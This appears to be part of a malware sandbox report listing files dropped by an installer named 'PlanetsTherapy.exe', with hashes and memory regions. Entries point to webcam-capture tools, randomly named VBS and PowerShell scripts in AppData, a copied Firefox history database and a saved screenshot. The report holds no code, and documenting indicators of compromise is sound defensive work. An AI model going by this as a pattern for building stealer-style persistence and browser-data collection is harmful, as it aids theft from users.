SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\mr.pak

MD5 f22c99fe6a838e333e8ee06a4d01296b
SHA1 c3542ea8dd45a2b387dd02fa5687948f135e10f2
SHA256 b03a3042f907aed13253ae8083d08f5fad59ff438d024b097276856e72526911
SHA512 882022c2cb985d85f96d52c9bcfeeb089d6ff30e66187ccf424ef622092b9d359a51bdef1fb6ac3b9d3409aa79d37ca737ba7f3ed8b9cdaabfe04d90a7c8bc15

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\resources\app.asar

MD5 51c536ac251a81c6a03b3e6f11a03c52
SHA1 06cc7d5317b42ec497bc98ae98c0cef02717819c
SHA256 405539215836611ce6ac020ef6f9fc7afd09e8d99142ffcf83ceb4cffd488f84
SHA512 13d595b3c8af3732ce561fd25425c914dc9115e176352dfde351e2161ed604de3cf4e49a81586fc3228223c28300e38d596f573f83e1cf81043856b3607e57d1

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 c0b36d56d83e601bf246f7709a8c5f9d
SHA1 b025a6070f7d61c7d1827856d2d4043834fd23f2
SHA256 45bb5e1f8dd87129ac0a75c78f8f29d06e3ac182a00fc5199b692068f1e05a53
SHA512 e429ae63bd8a7d5a936a638783511693e8fbbc91d97779b3d4dd3f0880f1c8a820106bfb57cf7ee6b3639f19165de87bbe127aadd81218689fc6c8fada2106d1

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 174028c95f4c64ae9c96becc415d6a1c
SHA1 0e51173240b159be5f85c4acbe09b83cd976eba1
SHA256 4324835487ae381a57799bbe0f7412c030158bd77da9d44872ab56e0e53ee632
SHA512 04b6643ea8484e611f3be46cb98a9b569923ffbe7602f56a8752633d9a34fad56fa9fbf1afa658da6797b963132275b0455fa97f82221c7b2071bbe36143b97e

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\resources\app.asar

MD5 27b8b8c23a2877703814ed7a2032559c
SHA1 311f38cf19c3c01f51095f52f2867b8995ed3e6f
SHA256 d0ab1322177ce82f1aeb6b482a153363ea7c0662ac0baa356fa0ff6022501605
SHA512 a5edcc1145c159a54266b0e3c8680599cd9353a70405fb29c9a6d47c9bc37bcf1c731528434f497064d0c036ac5ca41705f3d70ffe878d4f1cde13e6dc834e72

C:\Users\Admin\AppData\Local\Temp\6a7f5c71-075f-47a3-a709-c8781f2e1d97.tmp.node

MD5 3072b68e3c226aff39e6782d025f25a8
SHA1 cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA256 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA512 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

C:\Users\Admin\AppData\Local\Temp\b1db3742-7492-4a32-a707-58409638d69a.tmp.node

MD5 fef7cace7e9b70252eb0cad3c803f811
SHA1 719437697b9351e84af9810e281786849f3a252d
SHA256 5c255845e9397ec5aede7abfe94a0e281d11b1550ed6ec0a0540bccf89bb5f7c
SHA512 12ac8c8ff239a1f79c13c65edf747b135c8e2123e6080255665bc1a8f85eb4b74a557de5f59e03a5e95dbe590b92f764b4c7f6f26b21e37084e2d58357b84f97

memory/4004-578-0x00007FFE2A180000-0x00007FFE2A181000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 0b30835ab954659ded64af18fedd19a3
SHA1 59b113ca933b39adc6b0248a1ccb2fb0ee04f983
SHA256 f0079d93ed31cf20874acd1caac934cf0d19d0dab230df82991525499deda658
SHA512 eb910f08a70e8c0adc0b2b8d6dd123fc0ed2f3b22df4ebc69a59b2a6f2dfbb54287e77b285e324144c323001739330d02785b0ab6b9589e85482e6c284121ef9

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 008f11f6d9dc0521882a9fd22c391c95
SHA1 cab153a19887fc94bd32658d628496f1318a3c4c
SHA256 b2360d216777a78f437cdc9cd57d2c996bc909c84051120a941a5c6ba251c9d7
SHA512 b59128d551ab0979e6cdcf45804b86cb53ce5a2f0a784ba4f059b70b8f27dfcdb11ec3050bf3a0b98cce3e15905fe457261cfaf72c2de2411358232131d92b04

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\ffmpeg.dll

MD5 51b6f6aaa0e4a78294c7640266285abe
SHA1 721ec031a2db783062042777327fcbce6b68ab67
SHA256 bfd93f702ffd4ab278d2a847192f808d1216220fd9cf1a60235be6c0291964ae
SHA512 7a03c091a15d2c903799829713be6a73531d8e01688d8b2dbf8e2c96a1dcf0ccefb1ce03aacca1898326a1f309c387949dd34954ca51c90b9e0b3743dbc390fb

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 510e672bac5794f340e910c3de7c3778
SHA1 0d4829d42377d8f1d7fd888f92ace67e3f9c699a
SHA256 666573abec589eef92798213e2425dfa09c3890db045d007e5387173d86e400f
SHA512 046e6d740c5ba8475f457fb0b556bfc3e970d6feb11d8c549a35be3f754a39cca48411a1bf0d32a66ea9fc3ab709e1483144133c06c209d6df60d204a9e1a4e2

memory/4004-593-0x00000241EEB80000-0x00000241EEC4D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vzymr12y.h0q.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3172-614-0x000001A66B520000-0x000001A66B542000-memory.dmp

memory/3172-619-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 235a8eb126d835efb2e253459ab8b089
SHA1 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512 a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

memory/2868-635-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

memory/2876-651-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/2876-652-0x00000250B1EA0000-0x00000250B1EB0000-memory.dmp

memory/2876-653-0x00000250B1EA0000-0x00000250B1EB0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe

MD5 3b2efa2a4e65bb9018535ba7120bbec9
SHA1 d1bfcf9fdf3200ade60e2c1a0ac4370531193f12
SHA256 0ce6468d55e9a83f2d31d02309ed70dc3e894a6f90626819dc414a9ae863030d
SHA512 49c3858c9306990ce98c70fe26676984fe2abb215793aa0988ed48d8a32ecc4f2271e16627612d5a03ba1ba4e5eacde38758538aadd5f7968305883682b8d47b

memory/2876-656-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

C:\Users\Admin\AppData\Roaming\r3naeRIDdQoK.vbs

MD5 4026805d36b03d1b13caf96237877906
SHA1 4677e317838dd4e6396e2eda0c312b43f83884e6
SHA256 1382c082069440c4555f4db936ef679eb0c8e36f5b4d87dd59fe758b49d7c615
SHA512 ba202a22d68bd508212365a882914a4aed43c09414bc75d44a318d32fc555471f9639e00e1842f08af2f2df79891e8056fd8e835364c2aeb118f7ccd5693a16d

memory/3172-698-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 0a478b3d774ebccc8150c517aa9520fb
SHA1 01615cac1e3dfe2eede4f177f26fbf7830ad7975
SHA256 d27670edcfad4d84339a403ba411c7dad122d5151c986922b09fd951b43da447
SHA512 483385f1814e6dbbc55d3e445c15015705e6b32c1799090ac8c01f1f8ce14b37c981b3959767024f6b4d3fe8b8e1bf240363a883d7a95af3026d15f808332435

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e09aded99d44eb2cc44d73d6f4696ea1
SHA1 ed9f97ec8e92d8bf7313b83f10a2b8ece6f55aec
SHA256 cb4e168e130319295f564aaf0f756dfacb86dbef4d648af20c6982aab3637dfb
SHA512 29163581c49c970c6f6a75e4e3f2a5d2d12f336ad8951de1a068511de4f524a745d5dec06bbc2f8f196b79749bea8e717527624d72379f3f8344f0b464272868

memory/4452-717-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4628-718-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4628-719-0x0000012463E40000-0x0000012463E50000-memory.dmp

memory/4452-729-0x000001DC320C0000-0x000001DC320D0000-memory.dmp

memory/4452-739-0x000001DC320C0000-0x000001DC320D0000-memory.dmp

memory/3048-748-0x0000021DE2D20000-0x0000021DE2D30000-memory.dmp

memory/4512-764-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4812-770-0x0000019CF21F0000-0x0000019CF2200000-memory.dmp

memory/4812-771-0x0000019CF21F0000-0x0000019CF2200000-memory.dmp

memory/4512-772-0x0000019D488E0000-0x0000019D488F0000-memory.dmp

memory/4628-773-0x0000012463E40000-0x0000012463E50000-memory.dmp

memory/2868-774-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/3048-775-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4512-777-0x0000019D488E0000-0x0000019D488F0000-memory.dmp

memory/4812-776-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/3048-779-0x0000021DE2D20000-0x0000021DE2D30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sTEixZrDta9V_temp.ps1

MD5 7f40a1df30e53989b50d77cc0b86cead
SHA1 7f7ee103cfd22753fc07cfe9aa8d88d3c0e9c2d4
SHA256 f6319e73a774ac4ccfe4ffbe3d950d33bb96739740e26d9a4822c5b09b661565
SHA512 a92c5ff0edc20a060d415fa887eab60a0a88956728d5e0e6d1395b46430e16622a3d5ccaf1be4fb48069c2363a6b5a12f282f3234d3c0ae9a0a0bc613483cfd6

memory/4452-780-0x000001DC320C0000-0x000001DC320D0000-memory.dmp

memory/4288-782-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4288-784-0x0000022977110000-0x0000022977120000-memory.dmp

memory/4288-783-0x0000022977110000-0x0000022977120000-memory.dmp

memory/4628-795-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4296-799-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4296-800-0x0000017BAB4C0000-0x0000017BAB4D0000-memory.dmp

memory/4512-801-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4296-802-0x0000017BAB4C0000-0x0000017BAB4D0000-memory.dmp

memory/4296-813-0x0000017BAB4C0000-0x0000017BAB4D0000-memory.dmp

memory/4296-815-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\places.sqlite_tmp

MD5 c8c0b757369aa7f76e8fcae360bd20a0
SHA1 19fd217a468db0bfc67c54b3b178610e1914bcdf
SHA256 ce8981afecb84ec22a296d9feb90b2e0f3d92bd4903cb8d137654580e986900c
SHA512 0e098a29f5b6d7d8189507b592635502ad18893c51bf904517b6e0b9e032e54bc4c2d281adf52ea469ff2a1e1b9ac57b157e0fd3666847fa38fce654ac6ffe14

memory/4288-866-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4812-871-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/2332-877-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4452-878-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/2332-881-0x0000024FEFDC0000-0x0000024FEFDD0000-memory.dmp

memory/2332-882-0x0000024FEFDC0000-0x0000024FEFDD0000-memory.dmp

memory/4452-883-0x000001DC320C0000-0x000001DC320D0000-memory.dmp

memory/3048-884-0x0000021DE2D20000-0x0000021DE2D30000-memory.dmp

memory/3048-885-0x0000021DE2D20000-0x0000021DE2D30000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8d460ce715a00afd56cda62e926b8b17
SHA1 3aa1ed2a3cd5e6e1a3240f222492c9e49c4eaf22
SHA256 195c9d4857b9486e312f80264b31ef7e9ba014ececd7731397ee75ce8d8f38cb
SHA512 1b9efe45bea12e59e552dcce73d597ad431aa274621d96e5a3d146e28cfb11d9f5af256f0bc986e8d4d043f6352b9410d01ddb048bd57445f544502eaf28d969

memory/4452-898-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/3048-899-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/3048-900-0x0000021DE2D20000-0x0000021DE2D30000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_NBPdrq.vbs

MD5 e06159d692546e67b7776865a235bb09
SHA1 83cfaf17f6cfe164c402254fb4f0397139efde40
SHA256 0e30d028b23484dcbc566138f56a03d2dff58ce1b8e2da544090d33361522da3
SHA512 e96f5fd670b73165f6135aa8f3ef9331dbd5fe76cfeb751b539f44b8974ed8ca522f4dcd4725666449fb0d452b756dc1dc2707b32924c4bed23aef899e5d8d59

memory/2332-903-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DEybUpMWLn7J4ftWEJYI\System\NUPNSVML - 2023-12-19_153626.png

MD5 8ae4a3789b90c17b9277587939c83a2f
SHA1 57f96e8a5341686ddd8e72479878a36a76740237
SHA256 89a08caca61c6929d1d3bc0f8ebc2bf0fda6ea42dff1668db1edcb3c5b188d18
SHA512 bd5c7de3a13c65cb974f2b56893d6f2f132ab25797a9e035fc18e5c025809cd2519f840bd2e63f5a73b28f6286935d69d432f21d6d160d41cea345f855dfefab

memory/1228-959-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/1228-960-0x000001EEB52B0000-0x000001EEB52C0000-memory.dmp

memory/1228-961-0x000001EEB52B0000-0x000001EEB52C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

memory/1228-963-0x000001EEB52B0000-0x000001EEB52C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 0f335dedbcfb9d5d149ce2f336febe6f
SHA1 4e0c9c07d67dd06459fb1b12194063fb88d3db06
SHA256 a75b73cf093db08ed9085e200be4b3876b8606de2126884f3fca094ad708079b
SHA512 6d34912f16344056393704d86ac5ee460f95a0a03a9bfed096747ef10a5c6e5610dcbabb94efa3b5a82410e5c64fa50b10b0323d5ed7c157871b2141831d80fa

C:\Users\Admin\AppData\Roaming\salut0yn5i.ps1

MD5 28e4eda7451c625bbe806b745753f729
SHA1 d29e9b2c2ac5b10188cbae92cffba6827728543d
SHA256 da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba
